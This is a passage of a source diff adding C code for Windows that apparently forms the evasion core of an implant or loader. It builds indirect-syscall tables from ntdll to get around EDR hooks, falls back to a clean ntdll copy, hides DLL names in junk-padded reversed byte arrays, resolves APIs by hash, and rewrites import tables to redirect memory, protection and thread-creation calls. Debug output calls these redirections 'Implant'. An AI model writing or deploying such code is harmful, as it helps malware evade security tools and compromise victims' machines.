+extern VOID SetFunctions(PVOID* pInternetOpenA, PVOID* pInternetConnectA, PVOID* pHttpOpenRequestA, PVOID* pInternetSetOptionA, PVOID* pHttpSendRequestA, PVOID* pInternetReadFile, PVOID* pNtAllocateVirtualMemory);
+
+
+extern NtAllocateVirtualMemoryStub();
+extern NtOpenProcessStub();
+extern NtProtectVirtualMemoryStub();
+extern NtReadVirtualMemoryStub();
+extern NtWriteVirtualMemoryStub();
+extern NtQueryVirtualMemoryStub();
+
+extern RtlCompareStringStub();
+extern RtlEqualStringStub();
+
+static PTEB RtlGetThreadEnvironmentBlock(VOID);
+
+EXTERN_C void PrintCall(unsigned long idx, unsigned long caller, unsigned long stack_addr)
+{
+    /*printf(" ==> Hook reached: Entry[%d] SSN: 0x%02X, RET: 0x%p, RSP: 0x%p, Fnc Addr: 0x%p \n",
+        idx,
+        SyscallList.Entries[idx].dwSsn,
+        caller,
+        stack_addr,
+        SyscallList.Entries[idx].pAddress);*/
+}
+
+BOOL InitApi(VOID)
+{
+
+    if (!FillSyscallTable())
+    {
+#ifdef DEBUG
+        printf("[!] Failed to fill Syscall List");
+#endif
+        return FALSE;
+    }
+
+    FillStatic();
+
+    PVOID lpNameAddr = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 200);
+
+    LPCSTR names[12] = {
+        (char[]) { 0x32,0x2d,0x33,0x2b,0x6c,0x2d,0x65,0x25,0x24,0x24,0x6e,0x26,0x2a,0x72,0x28,0x2e,0x65,0x40,0x21,0x6b,0x00 }, //kernel32 
+        (char[]) { 0x65,0x73,0x2e,0x61,0x62,0x23,0x24,0x6c,0x65,0x28,0x2a,0x6e,0x5e,0x72,0x25,0x24,0x65,0x40,0x21,0x6b,0x00 }, //kernelbase
+        (char[]) {0x32,0x33,0x72,0x24,0x23,0x65,0x29,0x2d,0x2d,0x73,0x40,0x21,0x75,0x24,0x23,0x40,0x00 },  //user32
+
+        (char[]) { 0x68,0x23,0x6e,0x2d,0x65,0xcb,0x86,0xcb,0x86,0x61,0x24,0x73,0x40,0x72,0x21,0x00 }, //rsaenh
+        (char[]) { 0x73,0x65,0x76,0x40,0x21,0x69,0x74,0x40,0x69,0x6d,0x26,0x69,0x72,0xcb,0x86,0x25,0x24,0x50,0x29,0x29,0x74,0x2d,0x70,0x79,0x23,0x72,0x63,0x3b,0x2e,0x40,0x21,0x62,0x00 }, //bcryptPrimitives
+        (char[]) { 0x70,0x74,0x2a,0x28,0x74,0x28,0x26,0x68,0xcb,0x86,0x25,0x6e,0x24,0x23,0x69,0x40,0x21,0x77,0x00 }, //winhttp
+        (char[]) { 0x32,0x33,0x25,0x24,0x5f,0x25,0x24,0x32,0x73,0x24,0x24,0x23,0x21,0x77,0x00 }, //WS2_32
+        (char[]) { 0x74,0x65,0x29,0x23,0x23,0x23,0x23,0x23,0x23,0x40,0x6e,0x69,0xcb,0x86,0x25,0x24,0x6e,0x2b,0x2d,0x69,0x26,0xcb,0x86,0x77,0x00 }, //wininet
+        (char[]) { 0x65,0x73,0x23,0x40,0x61,0x24,0x62,0x28,0x2a,0x26,0x74,0x70,0x79,0xcb,0x86,0x25,0x72,0x2a,0x28,0x29,0x63,0x00 }, //CRYPTBASE
+        (char[]) { 0x73,0x6c,0x21,0x69,0x21,0x74,0x21,0x75,0x21,0x74,0x21,0x65,0x21,0x6e,0x00 }, //netutils
+        (char[]) { 0x70,0x73,0x74,0x70,0x26,0x79,0x26,0xcb,0x86,0x72,0x25,0x24,0x23,0x63,0x00 }, //CRYPTSP
+        (char[]) { 0x65,0x72,0x40,0x6f,0x29,0x40,0x21,0x63,0x67,0x62,0xcb,0x86,0xcb,0x86,0x25,0x24,0x64,0x00 }, //dbgcore
+    };
+
+    for (WORD ib = 0; ib < 12; ib++)
+    {
+        LPCSTR lName = (LPCSTR)lpNameAddr;
+        memset(lpNameAddr, 0, 200);
+        WORD i2 = 0;
+        WORD s2 = 0;
+        for (short i = 0; i < 200; i++)
+        {
+            char c = (char)*(((PBYTE)names[ib]) + i);
+            if (c == 0x00) {
+                s2 = i - 1;
+                break;
+            }
+        }
+        for (signed short i = s2; i >= 0; i--)
+        {
+            char c = (char)*(((PBYTE)names[ib]) + i);
+            if ((c >= 0x30 && c <= 0x39) || (c >= 0x41 && c <= 0x5A) || (c >= 0x61 && c <= 0x7a) || c == 0x5f) {
+                ((char)*((char*)((PBYTE)lpNameAddr + i2++))) = (char)*(((PBYTE)names[ib]) + i);
+            }
+        }
+        ExecAddr(Local(), lName, TRUE);
+
+        //UnhookAll((HANDLE)-1, lName, FALSE);
+    }
+    
+    
+
+    return TRUE;
+}
+
+PVOID CurNtdll(VOID)
+{
+    PTEB pCurrentTeb;
+    PPEB pCurrentPeb;
+
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+
+    PVOID pBase = NULL;
+    PVOID npBase;
+
+    pCurrentPeb = NtCurrentPeb();
+
+    if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+        goto cfinal;
+
+    pImageExportDirectory = NULL;
+    pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+    pBase = pLdrDataEntry->DllBase;
+
+    pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        goto cfinal;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        goto cfinal;
+
+cfinal:
+    if (pBase == NULL) {
+        npBase = GetClearNtdll();
+        if (npBase != NULL) {
+            pBase = npBase;
+        }
+    }
+
+    return pBase;
+}
+
+static BOOL FillSyscallTable(VOID)
+{
+    //Return if it already filled
+    if (SyscallList.Count > 0) return TRUE;
+
+    if (!GetBaseAddresses()) return FALSE;
+
+    PPEB pCurrentPeb;
+
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+
+    PVOID va;
+    PVOID pBase;
+    PVOID pRealBase = CurNtdll();
+
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory2 = NULL;
+    PIMAGE_NT_HEADERS pImageNtHeaders2 = NULL;
+    PDWORD pdwFunctions2 = NULL;
+    PDWORD pdwNames2 = NULL;
+    PWORD pwNameOrdinals2 = NULL;
+
+    pImageNtHeaders2 = ((PIMAGE_NT_HEADERS)((PBYTE)pRealBase + ((PIMAGE_DOS_HEADER)pRealBase)->e_lfanew));
+    if (pImageNtHeaders2->Signature == IMAGE_NT_SIGNATURE && pImageNtHeaders2->OptionalHeader.DataDirectory[0].Size > 0) {
+        pImageExportDirectory2 = (PBYTE)pRealBase + pImageNtHeaders2->OptionalHeader.DataDirectory[0].VirtualAddress;
+        pdwFunctions2 = (PDWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfFunctions);
+        pwNameOrdinals2 = (PWORD)((PBYTE)pRealBase + pImageExportDirectory2->AddressOfNameOrdinals);
+    }
+
+
+    SetTableAddr(&SyscallList.Entries);
+
+    pBase = ntdllBase;
+
+#ifdef DEBUG
+    printf("0x%p = &SyscallList\n0x%p = &Ntdll base\n0x%p = &Ntdll real base\n", &SyscallList, pBase, pRealBase);
+#endif
+
+procdll:
+
+    pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        return FALSE;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        return FALSE;
+
+    ModList.Count = 1;
+    ModList.Entries[0].pAddress = pBase;
+
+    // Create a copy of the first 4096 bytes
+    PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+    //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (!lpLocalAddress)
+        return FALSE;
+
+    va = (PVOID)((PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+    memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+
+    pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+
+#ifdef DEBUG
+    printf("0x%p = pImageExportDirectory\n", pImageExportDirectory);
+    printf("0x%p = lpLocalAddress\n", lpLocalAddress);
+#endif
+
+    PDWORD pdwFunctions;
+    PDWORD pdwNames;
+    PWORD pwNameOrdinals;
+
+    PCHAR pcName = NULL;
+    PVOID pAddress = NULL;
+
+    pdwFunctions = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
+    pdwNames = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNames);
+    pwNameOrdinals = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pImageExportDirectory->AddressOfNameOrdinals);
+
+    PSYSCALL_INFO Entries = SyscallList.Entries;
+
+    DWORD idx = 0;
+    BOOLEAN force = FALSE;
+    BOOLEAN bDiff = FALSE;
+
+#ifdef DEBUG
+    printf("[>] Hooked Ntdll Syscall List:\n");
+#endif
+
+    USHORT nameBase[2] = { 'tN', 'wZ' };
+    for (WORD ib = 0; ib < sizeof(nameBase); ib++) {
+        for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+
+            force = FALSE;
+            pcName = RVA2OFFSET(PDWORD, pBase, lpLocalAddress, va, pdwNames[i]);
+            pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+
+            if (pImageExportDirectory2 != NULL && (DWORD64)pBase != (DWORD64)pRealBase && pImageExportDirectory->NumberOfNames == pImageExportDirectory2->NumberOfNames) {
+                PVOID pAddress2 = (PBYTE)pRealBase + pdwFunctions2[pwNameOrdinals2[i]];
+                bDiff = ((DWORD64)pAddress != (DWORD64)pAddress2);
+            }
+
+            if (lstrcmpiA(pcName, "RtlAllocateHeap") == 0)
+                pRtlAllocateHeap = (PVOID)pAddress;
+
+            // Is this a system call?
+            if ((*(USHORT*)pcName != nameBase[ib]))
+                continue;
+
+            //Skip 2 first chars to ignore Zw and Nt
+            DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+
+            if (dwHash == 0x66C71BD1B0714D3E) // NtQuerySystemTime => False positive
+                continue;
+
+            //Our minimal 7 functions
+            if ((dwHash == 0x8AD1C604A65844A5) || (dwHash == 0x7AF7191D67000DB5) || (dwHash == 0x852E6B87B62C2CF0) || (dwHash == 0x0F4CE15C0758B33F)
+                || (dwHash == 0x989246E5A13FCBD9) || (dwHash == 0x8599A0E7F8A94577) || (dwHash == 0x0EDA779755029A0A))
+                force = TRUE;
+
+            //Force other critical calls
+            /*
+            NtQueryVirtualMemory 0x0EDA779755029A0A
+            NtCreateUserProcess 0x172ECAD8537A0F66
+            NtCreateThread 0xDCAA9BF058531500
+            NtCreateThreadEx 0xB1C15967B96C5E5D
+            ZwResumeThread 0xE6EBB45B4D604B1D
+            */
+
+            if (!force && (
+                (dwHash == 0xDCAA9BF058531500) || (dwHash == 0xB1C15967B96C5E5D) || (dwHash == 0xE6EBB45B4D604B1D) || (dwHash == 0x172ECAD8537A0F66)
+                ))
+                force = TRUE;
+
+            ////printf("%s 0x%p 0x%p\n", pcName, pAddress, dwHash);
+
+            /*
+                Handle hooked functions
+
+                jmp <edr.dll>
+                ; or
+                mov r10, rcx
+                jmp <edr.dll>
+            */
+
+            DWORD64 dwSsn = GetSSN(pAddress);
+            if (dwSsn == -1)
+                continue;
+
+            PVOID pSyscallRet = GetNextSyscallInstruction(pAddress);
+            if (pSyscallRet == NULL)
+                continue;
+
+            BOOLEAN dupFound = FALSE;
+            for (DWORD id = 0; id < SyscallList.Count; id++)
+            {
+                ////printf("%d 0x%p 0x%p\n", id, (DWORD64)Entries[id].pAddress, (DWORD64)pAddress);
+
+                if ((DWORD64)Entries[id].pAddress == (DWORD64)pAddress) dupFound = TRUE;
+            }
+
+            if (dupFound)
+                continue;
+
+            Entries[idx].pAddress = pAddress;
+            Entries[idx].dwSsn = dwSsn;
+            Entries[idx].pSyscallRet = pSyscallRet;
+            Entries[idx].dwHash = dwHash;
+            Entries[idx].bIsHooked = (BOOLEAN)(force || bDiff || (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9));
+
+#ifdef DEBUG
+            if (Entries[idx].bIsHooked)
+            {
+                printf("  |--> Entries[%03lu] SSN = 0x%04X, Address = 0x%p: %s\n", idx, dwSsn, pAddress, pcName);
+            }
+#endif
+
+            if (dwHash == 0x8AD1C604A65844A5)
+                SetIdx(0, idx); // 0 => ZwOpenProcess 
+            else if (dwHash == 0x7AF7191D67000DB5)
+                SetIdx(1, idx); // 1 => ZwProtectVirtualMemory 
+            else if (dwHash == 0x852E6B87B62C2CF0)
+                SetIdx(2, idx); // 2 => ZwReadVirtualMemory 
+            else if (dwHash == 0x0F4CE15C0758B33F)
+                SetIdx(3, idx); // 3 => ZwWriteVirtualMemory 
+            else if (dwHash == 0x989246E5A13FCBD9)
+                SetIdx(4, idx); // 4 => ZwAllocateVirtualMemory 
+            else if (dwHash == 0x8599A0E7F8A94577)
+                SetIdx(5, idx); // 5 => ZwDelayExecution 
+            else if (dwHash == 0x0EDA779755029A0A)
+                SetIdx(6, idx); // 6 => NtQueryVirtualMemory 
+
+            idx++;
+            if (idx == MAX_ENTRIES) break;
+            continue;
+        }
+
+        // Save total number of system calls found.
+        SyscallList.Count = idx;
+
+        if (idx == MAX_ENTRIES) break;
+    }
+
+    if (SyscallList.Count < 7) {
+
+#ifdef DEBUG
+        printf("  |--> Getting other Ntdll version\n");
+#endif
+        PVOID npBase = GetClearNtdll();
+        if ((npBase != NULL) && ((DWORD64)npBase != (DWORD64)pBase)) {
+            pBase = npBase;
+            goto procdll;
+        }
+    }
+
+#ifdef DEBUG
+    printf("  +--> Mapped %lld functions\n", SyscallList.Count);
+#endif
+
+    if (SyscallList.Count > 0) {
+
+        SetAddr(&UnhookAll);
+
+    }
+
+    return SyscallList.Count > 0;
+}
+
+BOOL FillStatic()
+{
+    /*
+    GetProcAddress 0x7E5C872C2386C38E
+    ReadProcessMemory 0x008A113C2D680A68
+    VirtualProtect 0x9BE32131D8A4F9FC
+    VirtualProtectEx 0x2130350A95CB7259
+    VirtualQuery 0xE9CF8C23129C8A71
+    VirtualQueryEx 0x9BE321322BE8F40E
+    */
+
+    if (HookList.Count == 0) {
+        HookList.Entries[0].pStubFunction = &HGetProcAddress3;
+        HookList.Entries[0].dwHash = 0x7E5C872C2386C38E;
+
+        HookList.Entries[1].pStubFunction = &HReadProcessMemory;
+        HookList.Entries[1].dwHash = 0x008A113C2D680A68;
+
+        //HookList.Entries[2].pStubFunction = &HVirtualProtect;
+        //HookList.Entries[2].dwHash = 0x9BE32131D8A4F9FC;
+
+        HookList.Entries[3].pStubFunction = &HVirtualProtectEx;
+        HookList.Entries[3].dwHash = 0x2130350A95CB7259;
+
+        //HookList.Entries[4].pStubFunction = &HVirtualQuery;
+        //HookList.Entries[4].dwHash = 0xE9CF8C23129C8A71;
+
+        //HookList.Entries[5].pStubFunction = &HVirtualQueryEx;
+        //HookList.Entries[5].dwHash = 0x9BE321322BE8F40E;
+
+        HookList.Count = 6;
+    }
+
+    return TRUE;
+}
+
+BOOL ProcAllByAddr(_In_ LPCSTR imageBaseName, _In_ PVOID imageBase, _In_opt_ HANDLE hProcess)
+{
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+    PVOID va;
+    PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = NULL;
+    LPCSTR imageName;
+
+    unsigned int hCount = 0;
+
+    if (imageBaseName != NULL) {
+        imageName = imageBaseName;
+    }
+    else {
+        imageName = "in memory";
+    }
+
+    if (hProcess == NULL)
+        hProcess = (HANDLE)-1;
+    
+    pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        return FALSE;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        return FALSE;
+
+    // Create a copy of the first 4096 bytes
+    //PVOID lpLocalAddress = VirtualAllocEx((HANDLE)-1, NULL, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+    if (!lpLocalAddress)
+        return FALSE;
+
+    va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+    memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size);
+
+    pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(lpLocalAddress);
+
+    LPCSTR libraryName = NULL;
+    HMODULE library = NULL;
+    PIMAGE_IMPORT_BY_NAME functionName = NULL;
+
+    PSYSCALL_INFO Entries = SyscallList.Entries;
+
+    DWORD minRVA = 0xffffffff;
+    DWORD maxRVA = 0;
+    PIMAGE_IMPORT_DESCRIPTOR tmp1 = (PIMAGE_IMPORT_DESCRIPTOR)(va);
+    while (tmp1->Name != NULL)
+    {
+        if (tmp1->Name > maxRVA)
+            maxRVA = tmp1->Name;
+        if (tmp1->Name < minRVA)
+            minRVA = tmp1->Name;
+
+        tmp1++;
+    }
+    maxRVA += 100; // Space for the last name
+
+    
+    //PVOID lpNames = VirtualAllocEx((HANDLE)-1, NULL, maxRVA - minRVA, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    PVOID lpNames = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, maxRVA - minRVA);
+    if (!lpNames)
+    {
+#ifdef DEBUG
+        printf("[!] Error getting data space for lpNames: Status = 0x%08lx\n", GetLastError());
+#endif
+        return FALSE;
+    }
+
+    PVOID vaNames = (PVOID)((PBYTE)imageBase + minRVA);
+    memcpy(lpNames, vaNames, maxRVA - minRVA);
+
+    // Allocate 8 Mb
+    //PVOID lpThunk = VirtualAllocEx((HANDLE)-1, NULL, 1 << 23, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    PVOID lpThunk = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 1 << 23);
+    if (!lpThunk)
+    {
+#ifdef DEBUG
+        printf("[!] Error getting data space for lpThunk: Status = 0x%08lx\n", GetLastError());
+#endif
+        return FALSE;
+    }
+
+    
+    while (pImportDescriptor->Name != NULL)
+    {
+        libraryName = RVA2OFFSET(LPCSTR, imageBase, lpNames, vaNames, (LPCSTR)pImportDescriptor->Name);
+
+        library = HGetModuleHandleA(libraryName, TRUE);
+
+        if (library == NULL) {
+#ifdef DEBUG
+            printf("[!] Error getting lib: Status = 0x%08lx\n", GetLastError());
+#endif
+        }
+
+        if (library)
+        {
+            minRVA = 0xffffffff;
+            maxRVA = 0;
+            PIMAGE_THUNK_DATA tmp2 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->OriginalFirstThunk);
+            PIMAGE_THUNK_DATA tmp3 = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + pImportDescriptor->FirstThunk);
+            while (tmp2->u1.AddressOfData != NULL)
+            {
+                if (tmp2->u1.AddressOfData > maxRVA)
+                    maxRVA = tmp2->u1.AddressOfData;
+                if (tmp2->u1.AddressOfData < minRVA)
+                    minRVA = tmp2->u1.AddressOfData;
+
+                DWORD c1 = (DWORD_PTR)tmp2 - (DWORD_PTR)imageBase;
+                if (c1 > maxRVA)
+                    maxRVA = c1;
+                if (c1 < minRVA)
+                    minRVA = c1;
+
+                c1 = (DWORD_PTR)tmp3 - (DWORD_PTR)imageBase;
+                if (c1 > maxRVA)
+                    maxRVA = c1;
+                if (c1 < minRVA)
+                    minRVA = c1;
+
+                ++tmp2;
+                ++tmp3;
+            }
+            maxRVA += 100; // Space for the last name
+
+            if ((maxRVA - minRVA) <= (1 << 23))
+            {
+                PVOID vaFuncs = (PVOID)((PBYTE)imageBase + minRVA);
+                memcpy(lpThunk, vaFuncs, maxRVA - minRVA);
+
+                PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+
+                originalFirstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->OriginalFirstThunk);
+                firstThunk = RVA2OFFSET(PIMAGE_THUNK_DATA, imageBase, lpThunk, vaFuncs, pImportDescriptor->FirstThunk);
+
+                while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000))
+                {
+                    functionName = RVA2OFFSET(PIMAGE_IMPORT_BY_NAME, imageBase, lpThunk, vaFuncs, originalFirstThunk->u1.AddressOfData);
+
+                    PBYTE pcName = ((PBYTE)&functionName->Name);
+
+                    PVOID fncAddr = NULL;
+                    DWORD ssn = -1;
+                    if ((DWORD64)library == (DWORD64)ntdllBase)
+                    {
+                        DWORD64 dwHash = djb2(((PBYTE)pcName) + 2);
+
+                        //printf("\n%s 0x%p, 0x%016llx\n", functionName->Name, firstThunk->u1.Function, dwHash);
+
+                        for (DWORD i = 0; i < SyscallList.Count; i++)
+                        {
+                            //printf("%s 0x%p,  0x%p,  0x%p\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, (DWORD64)firstThunk->u1.Function);
+
+                            if ((DWORD64)Entries[i].pAddress == (DWORD64)firstThunk->u1.Function)
+                            {
+                                if (Entries[i].bIsHooked) {
+                                    fncAddr = Entries[i].pStubFunction;
+                                    ssn = Entries[i].dwSsn;
+                                    //printf("%s 0x%p 0x%016llx 0x%016llx\n", functionName->Name, fncAddr, dwHash, Entries[i].dwHash);
+                                }
+                                break;
+                            }
+                            else if (dwHash == Entries[i].dwHash)
+                            {
+                                //printf("%s 0x%p,  0x%p,  0x%p 0x%016llx\n", functionName->Name, firstThunk->u1.Function, (DWORD64)Entries[i].pAddress, fncAddr, dwHash);
+                                fncAddr = Entries[i].pStubFunction;
+                                ssn = Entries[i].dwSsn;
+                                break;
+                            }
+                        }
+                    }
+
+                    if ((fncAddr == NULL) && ((DWORD64)library != (DWORD64)ntdllBase))
+                    {
+                        DWORD64 dwHash = djb2(((PBYTE)pcName));
+                        for (DWORD i = 0; i < HookList.Count; i++)
+                        {
+                            if (dwHash == HookList.Entries[i].dwHash)
+                            {
+                                fncAddr = HookList.Entries[i].pStubFunction;
+                                break;
+                            }
+                        }
+                    }
+
+                    if (fncAddr != NULL)
+                    {
+                        //printf("%s 0x%p\n", functionName->Name, fncAddr);
+
+                        SIZE_T bytesWritten = 0;
+                        DWORD oldProtect = 0;
+                        PVOID lpAddress;
+                        PVOID fncAddress;
+                        SIZE_T sDataSize = 8;
+
+                        PIMAGE_THUNK_DATA pRealThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + OFFSET2RVA(imageBase, lpThunk, vaFuncs, firstThunk));
+
+                        lpAddress = fncAddress = (LPVOID)(&pRealThunk->u1.Function);
+
+                        HANDLE hProc = (HANDLE)-1;
+                        if (hProcess != (HANDLE)-1)
+                            hProc = hProcess;
+
+                        if (NtProtectVirtualMemory(hProc, &lpAddress, &sDataSize, PAGE_READWRITE, &oldProtect) == 0)
+                        {
+                            pRealThunk->u1.Function = (DWORD_PTR)fncAddr;
+                            hCount++;
+#ifdef DEBUG
+                            if (ssn != -1)
+                                printf("  |--> Implant %s %s->%s 0x%p SSN 0x%02X\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function, ssn);
+                            else
+                                printf("  |--> Implant %s %s->%s 0x%p\n", imageName, libraryName, functionName->Name, pRealThunk->u1.Function);
+#endif
+                        }
+                    }
+
+                    ++originalFirstThunk;
+                    ++firstThunk;
+                }
+            }
+        }
+
+        pImportDescriptor++;
+    }
+#ifdef DEBUG
+    printf("  +--> Hooked %d function(s)\n", hCount);
+#endif
+}
+
+BOOL UnhookAll(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force)
+{
+
+    LPVOID imageBase = HGetModuleHandleA(imageName, force);
+    if ((force && (imageBase == NULL)) || ((imageBase == NULL) && (hProcess != (HANDLE)-1)))
+        imageBase = HGetModuleHandleA(imageName, TRUE);
+#ifdef DEBUG
+    printf("\n[>] IAT Hook of: %s => 0x%p\n", imageName, imageBase);
+#endif
+    if (imageBase == NULL)
+    {
+
+#ifdef DEBUG
+
+        DWORD le = GetLastError();
+        if (le == 126) {
+            printf("[-] UnhookAll(%s): %s\n", imageName, "Module handle not found!");
+        }
+        else {
+            printf("[-] UnhookAll(%s): %u\n", imageName, GetLastError());
+        }
+#endif
+        return FALSE;
+    }
+
+    return ProcAllByAddr(imageName, imageBase, hProcess);
+    //return ExecAddr2(imageName, imageBase, hProcess);
+}
+
+FARPROC HGetModuleHandleA(LPCSTR imageName, _In_ BOOLEAN forceLoad)
+{
+
+    DWORD64 dwHash = djb2(((PBYTE)imageName) + 2);
+    PMODULE_INFO Entries = ModList.Entries;
+
+    for (DWORD i = 0; i < ModList.Count; i++)
+    {
+        if (dwHash == Entries[i].dwHash)
+            return (FARPROC)Entries[i].pAddress;
+    }
+
+    LPVOID imageBase = GetModuleHandleA(imageName);
+    if (forceLoad && (imageBase == NULL))
+        imageBase = LoadLibraryA(imageName);
+
+    if (imageBase == NULL)
+        return NULL;
+
+    Entries[ModList.Count].pAddress = imageBase;
+    Entries[ModList.Count].dwHash = dwHash;
+
+    ModList.Count++;
+
+    return imageBase;
+}
+
+FARPROC HGetProcAddress2(LPCSTR imageName, LPCSTR procName)
+{
+    LPVOID imageBase = HGetModuleHandleA(imageName, TRUE);
+
+    return HGetProcAddress(imageBase, procName, 0);
+}
+
+FARPROC HGetProcAddress3(FARPROC imageBase, LPCSTR procName)
+{
+    //FARPROC addr = HGetProcAddress(imageBase, procName, 0x00);
+    //printf("GetProcAddress 0x%p %s -> 0x%p\n", imageBase, procName, addr);
+    //return addr;
+    return HGetProcAddress(imageBase, procName, 0x00);
+}
+
+FARPROC HGetProcAddress(FARPROC imageBase, LPCSTR procName, _In_opt_ DWORD64 procHash)
+{
+    PPEB pCurrentPeb;
+
+    PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+    PIMAGE_DOS_HEADER pImageDosHeader;
+    PIMAGE_NT_HEADERS pImageNtHeaders;
+
+    PVOID va;
+
+    pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+
+    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+        return NULL;
+
+    pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+
+    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+        return NULL;
+
+    //Check if is a hooked/mapped function
+    if ((SyscallList.Count > 0) && ((DWORD64)ntdllBase == (DWORD64)imageBase)) {
+
+        PSYSCALL_INFO Entries = SyscallList.Entries;
+
+        DWORD64 dwHash = 0;
+        if (procName != NULL) dwHash = djb2(((PBYTE)procName) + 2);
+
+        for (DWORD i = 0; i < SyscallList.Count; i++)
+        {
+            if ((procHash > 0) && (procHash == Entries[i].dwHash))
+                return Entries[i].pStubFunction;
+
+            if ((procName != NULL) && (dwHash == Entries[i].dwHash))
+                return Entries[i].pStubFunction;
+        }
+    }
+
+    //Check if is a hooked/mapped function
+    if ((HookList.Count > 0) && (procName != NULL)) {
+
+        PSYSCALL_INFO Entries = HookList.Entries;
+
+        DWORD64 dwHash = djb2(((PBYTE)procName));
+
+        for (DWORD i = 0; i < HookList.Count; i++)
+        {
+            if (dwHash == Entries[i].dwHash)
+                return Entries[i].pStubFunction;
+        }
+    }
+    
+    // Create a copy of the first 4096 bytes
+    PVOID lpLocalAddress = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+    if (!lpLocalAddress)
+        return NULL;
+
+    va = (PVOID)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+    memcpy(lpLocalAddress, va, pImageNtHeaders->OptionalHeader.DataDirectory[0].Size);
+
+    pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(lpLocalAddress);
+
+    PDWORD pdwFunctions = RVA2OFFSET(PDWORD, imageBase, lpLocalAddress, va, pImageExportDirectory->AddressOfFunctions);
